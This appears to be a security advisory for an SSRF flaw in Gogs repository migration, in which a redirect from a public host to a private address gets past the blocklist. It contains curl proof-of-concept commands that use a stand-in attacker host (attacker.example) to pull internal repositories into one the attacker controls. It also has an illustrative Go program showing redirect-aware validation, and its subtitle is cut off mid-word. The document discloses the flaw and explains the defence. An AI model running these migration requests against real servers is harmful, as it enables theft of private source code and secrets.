CVE-2026-52805: Gogs Migration Redirect Bypass SSRF (Internal Repository Theft)
Gogs lets any authenticated user steal internal Git repositories by submitting a migration URL that redirects to a private network address, bypassing the hostname blocklist because only the initial UR

The problem
The migration endpoint in `internal/form/repo.go` runs `ParseRemoteAddr()` to block private-network hostnames before cloning. However, the actual clone is done with `git clone --mirror` in `internal/database/repo.go`, and Git follows HTTP redirects transparently.
Because redirect targets are never revalidated, an attacker can pass a public hostname at submission time, then have their server issue a 302 to any internal address (127.0.0.1, 10.x, 192.168.x). The cloned content lands in an attacker-controlled repository, exposing source code and secrets from internal services.
Proof of concept
```shell
# Step 1: direct localhost URL is blocked
curl -sS -X POST -H "Authorization: token ${TOKEN}" \
  -H "Content-Type: application/json" \
  --data '{"clone_addr":"http://127.0.0.1:18081/victim/private.git","uid":2,"repo_name":"blocked"}' \
  "${GOGS_URL}/api/v1/repos/migrate"
# Result: rejected

# Step 2: public URL that 302-redirects to the blocked internal endpoint
curl -sS -X POST -H "Authorization: token ${TOKEN}" \
  -H "Content-Type: application/json" \
  --data '{"clone_addr":"http://attacker.example/redirect.git","uid":2,"repo_name":"stolen","private":true}' \
  "${GOGS_URL}/api/v1/repos/migrate"
# Result: migration succeeds, new repo contains internal repo contents
```

The root cause is a TOCTOU gap: validation happens on the user-supplied URL, but execution (`git clone --mirror`) operates on whatever endpoint Git ends up at after following redirects. CWE-918 (SSRF) applies directly. The patch at commit b9a0093 (PR #8324) adds post-redirect revalidation so that the final destination hostname is checked against the same private-network blocklist as the initial URL.
The fix also addresses stale host validation on stored mirror URLs used during recurring sync, closing a related vector in the Mirror Settings flow.
The fix
Upgrade to Gogs 0.14.3 or later. The patch adds redirect-aware validation so every redirect target is checked against the private-network blocklist before Git follows it. If you cannot upgrade immediately, restrict repository migration to admin-only accounts and disable open user registration (`DISABLE_REGISTRATION = true` in `app.ini`).
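The following Go program is an added illustration of the TOCTOU gap and of the redirect-aware validation the fix describes; it is not Gogs' code and not the actual patch. It reproduces the scenario offline: a constructed "attacker" server answers `/redirect.git` with a 302 to a loopback address, a custom transport dials that test server for every hostname so no real DNS or network is involved, and the `Resolver` type, `checkHost`, `guardedClient`, `fetchFinalURL` and `demo` are all hypothetical helpers written for this example. The unguarded client ends up at the internal URL; the guarded client re-runs the same host check in `http.Client.CheckRedirect` and aborts before the redirect is followed.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// Resolver abstracts DNS so the check runs offline against a constructed
// lookup table; hypothetical helper, not part of Gogs.
type Resolver func(host string) ([]net.IP, error)

// isBlockedIP expresses a private-network blocklist: loopback, RFC 1918 and
// ULA ranges, link-local and unspecified addresses are all refused.
func isBlockedIP(ip net.IP) bool {
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsUnspecified()
}

// checkHost validates one URL: http(s) only, and every address the host
// resolves to (or the IP literal itself) must lie outside the blocklist.
func checkHost(raw string, resolve Resolver) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	host := u.Hostname()
	if host == "" {
		return errors.New("empty host")
	}
	var ips []net.IP
	if ip := net.ParseIP(host); ip != nil {
		ips = []net.IP{ip}
	} else if ips, err = resolve(host); err != nil {
		return fmt.Errorf("resolve %q: %w", host, err)
	}
	if len(ips) == 0 {
		return fmt.Errorf("host %q resolved to no addresses", host)
	}
	for _, ip := range ips {
		if isBlockedIP(ip) {
			return fmt.Errorf("host %q resolves to blocked address %s", host, ip)
		}
	}
	return nil
}

// guardedClient re-runs checkHost on every redirect target, so a 302 to an
// internal address aborts the request instead of being followed.
func guardedClient(transport http.RoundTripper, resolve Resolver) *http.Client {
	return &http.Client{
		Transport: transport,
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			if len(via) >= 5 {
				return errors.New("too many redirects")
			}
			return checkHost(req.URL.String(), resolve)
		},
	}
}

// fetchFinalURL applies the pre-request check, performs the GET, and reports
// the URL the client actually ended up at after any redirects.
func fetchFinalURL(c *http.Client, raw string, resolve Resolver) (string, error) {
	if err := checkHost(raw, resolve); err != nil {
		return "", err
	}
	resp, err := c.Get(raw)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	return resp.Request.URL.String(), nil
}

// demo runs the constructed scenario and returns the final URL reached by an
// unguarded client together with the error produced by the guarded one.
func demo() (followedTo string, guardedErr error) {
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path == "/redirect.git" {
			http.Redirect(w, r, "http://127.0.0.1:18081/victim/private.git", http.StatusFound)
			return
		}
		w.WriteHeader(http.StatusOK)
	}))
	defer srv.Close()
	// Every hostname is dialed to the test server; no real network is touched.
	transport := &http.Transport{
		DialContext: func(ctx context.Context, network, _ string) (net.Conn, error) {
			return (&net.Dialer{}).DialContext(ctx, network, srv.Listener.Addr().String())
		},
	}
	defer transport.CloseIdleConnections()
	// Constructed lookup table: the submitted host is public, so it passes
	// the pre-request check just like step 2 of the proof of concept.
	resolve := func(host string) ([]net.IP, error) {
		if host == "attacker.example" {
			return []net.IP{net.ParseIP("203.0.113.10")}, nil
		}
		return nil, fmt.Errorf("unknown host %q", host)
	}
	start := "http://attacker.example/redirect.git"
	followedTo, _ = fetchFinalURL(&http.Client{Transport: transport}, start, resolve)
	_, guardedErr = fetchFinalURL(guardedClient(transport, resolve), start, resolve)
	return followedTo, guardedErr
}

func main() {
	followedTo, err := demo()
	fmt.Println("unguarded client ended at:", followedTo)
	fmt.Println("guarded client error:", err)
}
```

Two design points carry over to a real deployment: the redirect check must resolve the target hostname and test every returned address, not just the literal string, or a public name pointing at an internal address slips through; and the same `Resolver` should be used for the pre-request and redirect checks so both stages apply one consistent blocklist.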